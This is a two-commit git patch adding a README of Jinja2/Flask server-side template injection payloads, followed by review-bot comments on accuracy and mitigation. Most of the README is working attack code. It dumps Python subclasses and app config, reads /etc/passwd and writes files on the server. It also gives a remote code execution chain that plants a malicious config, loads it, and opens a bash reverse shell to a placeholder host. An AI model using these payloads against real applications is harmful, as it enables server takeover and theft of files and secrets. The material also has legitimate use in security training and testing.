From 76b15d575e3598c44a6e89aad1984e77da3404f4 Mon Sep 17 00:00:00 2001 From: Soka Date: Sat, 1 Apr 2017 18:48:44 +0300 Subject: [PATCH 1/2] Add Template injections + Jinja template injection --- Template injections/README.md | 64 +++++++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 Template injections/README.md diff --git a/Template injections/README.md b/Template injections/README.md new file mode 100644 index 00000000..f1535c49 --- /dev/null +++ b/Template injections/README.md @@ -0,0 +1,64 @@ +# Templates Injections + +Template injection allows an attacker to include template code into an existant (or not) template. + +## Jinja2 +[Official website](http://jinja.pocoo.org/) +> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. + +Jinja2 is used by Python Web Frameworks such as Django or Flask. +The above injections have been tested on Flask application. +#### Template format +``` +{% extends "layout.html" %} +{% block body %} + +{% endblock %} + +``` + +#### Dump all used classes +``` +{{ ''.__class__.__mro__[2].__subclasses__() }} +``` + +#### Dump all config variables +```python +{% for key, value in config.iteritems() %} +
{{ key|e }}
+
{{ value|e }}
+{% endfor %} +``` + +#### Read remote file +``` +# ''.__class__.__mro__[2].__subclasses__()[40] = File class +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} +``` + +#### Write into remote file +```python +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} +``` + +#### Remote Code Execution via reverse shell +Listen for connexion +``` +nv -lnvp 8000 +``` +Inject this template +```python +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config +{{ config.from_pyfile('/tmp/sokaexploit.cfg') }} # load the evil config +{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host +``` + +#### Ressources & Sources +[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) + +#### Training +[https://w3challs.com/](https://w3challs.com/) \ No newline at end of file From bb98bd93395649c38e7a398c1ecbff5070fb6197 Mon Sep 17 00:00:00 2001 From: Soka Date: Sat, 1 Apr 2017 18:53:43 +0300 Subject: [PATCH 2/2] Add Template injections + Jinja template injection --- Template injections/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Template injections/README.md b/Template injections/README.md index f1535c49..59e9f3f7 100644 --- a/Template injections/README.md +++ b/Template injections/README.md 
@@ -53,7 +53,7 @@ nv -lnvp 8000 Inject this template ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config -{{ config.from_pyfile('/tmp/sokaexploit.cfg') }} # load the evil config +{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` @@ -61,4 +61,4 @@ Inject this template [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) #### Training -[https://w3challs.com/](https://w3challs.com/) \ No newline at end of file +[https://w3challs.com/](https://w3challs.com/)
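Review bot: In the new `Template injections/README.md` hunk, several sections document Python 2-only behaviour without saying so: `config.iteritems()` does not exist on Python 3 (`items()` does), and `''.__class__.__mro__[2]` together with the `__subclasses__()[40]` index only resolves to `file` on CPython 2, so the `# ... = File class` comment should name the interpreter version the snippet was observed on instead of presenting the index as fixed. The prose also says Jinja2 is used by "Django or Flask", but Django ships its own template language and only offers Jinja2 as an optional backend, so "such as Flask" would be accurate; "The above injections" should read "The injections below"; the fences are inconsistent (some untagged, some tagged `python` although the content is Jinja template syntax, not Python); and "existant", "connexion" and "Ressources" should be "existing", "connection" and "Resources", with the title as "Template Injections". Since the quoted blurb advertises the "optional integrated sandboxed execution environment", a short Mitigation section would round the page out: pass user data only as context variables to a fixed template (e.g. `render_template('page.html', name=user_input)`), never concatenate it into the template source handed to `render_template_string`, and treat Jinja2's `SandboxedEnvironment` as a second layer rather than the primary control.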
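Review bot: The filename change in the first hunk of PATCH 2/2 is the right fix (the first commit wrote `/tmp/evilconfig.cfg` but then loaded `/tmp/sokaexploit.cfg`, so the snippet as documented was inconsistent), but the commit message is a verbatim copy of commit 1's "Add Template injections + Jinja template injection" and says nothing about the correction; either squash it into the first commit or give it a message such as "Fix config filename mismatch in Jinja2 example". From the defensive side the hunk also deserves one sentence in the README: `config.from_pyfile()` executes the target file as Python, so any location the application can write to must never be one that `from_pyfile`/`from_object` later loads from, and those loaders should only point at read-only configuration paths.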
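Review bot: Adding the missing trailing newline in the second hunk of PATCH 2/2 is fine, but as a one-line whitespace fix carrying the same commit message as PATCH 1/2 it should be squashed into the first commit rather than landing as a separate commit in the history.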